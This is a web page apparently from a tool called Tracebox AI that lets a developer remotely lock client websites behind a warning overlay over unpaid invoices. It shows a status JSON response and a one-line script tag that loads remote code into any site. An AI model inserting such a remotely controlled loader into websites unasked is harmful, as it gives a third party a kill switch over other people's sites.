T
TRACEBOX AI
HomeDashboardAll ToolsClient Status Lock
Categories
Invoices & ReceiptsFinancial & TaxMarketing & AI SearchDeveloper & WebRTCContractors & PropertyPDF & DocumentsImage & MediaAI ToolsProductivity
Your Workspace
NotesFavoritesRecentTemplates
Upgrade to Pro

Unlock premium features & storage.

Storage (2.4 / 10 GB)24%
SettingsHelp & Support
HomeTools
Create
Notes

Client Site Status & Warning Controller

Zero-DB Engine

1-Click administrative lockdown & live operational toggle for any client website. Changes propagate globally via instant JSON endpoints.

Live Warning Preview
Managed Clients (0)Status
Loading clients...
Storage: Local JSONdata/clients-status.json
Administrative Lock Active(Slug: x-gang)

X GANG Website

⚠️ Client site will display administrative hold/warning overlay when visitor loads page.

Click above to switch state, then save.

Client Lock & Warning Details

Client ID: x-gang
Public Reason Text
Presets:
View Client Status JSON

Live Endpoint Response Inspector

GET/api/client-status?client=x-gang
CORS: Enabled (*)
{
  "client": "x-gang",
  "name": "X GANG Website",
  "isLocked": true,
  "reason": "Milestone Invoice Clearance Pending",
  "referenceCode": "REF-XG-HOLD-2026-8910",
  "phoneNumber": "+918088271964",
  "displayPhone": "+91 80882 71964",
  "updatedAt": "2026-09-27T09:41:20.715Z"
}

Client Site Integration Snippet

Paste this single line into the <head> or <body> of any website (WordPress, Shopify, Webflow, PHP, Next.js). It immediately enforces warning hold when toggled ON.

<!-- 🔒 1-Line Tracebox Status Lock (Paste in <head> or <body> of any website) -->
<script src="https://tracebox.in/api/client-status/loader?client=x-gang" async></script>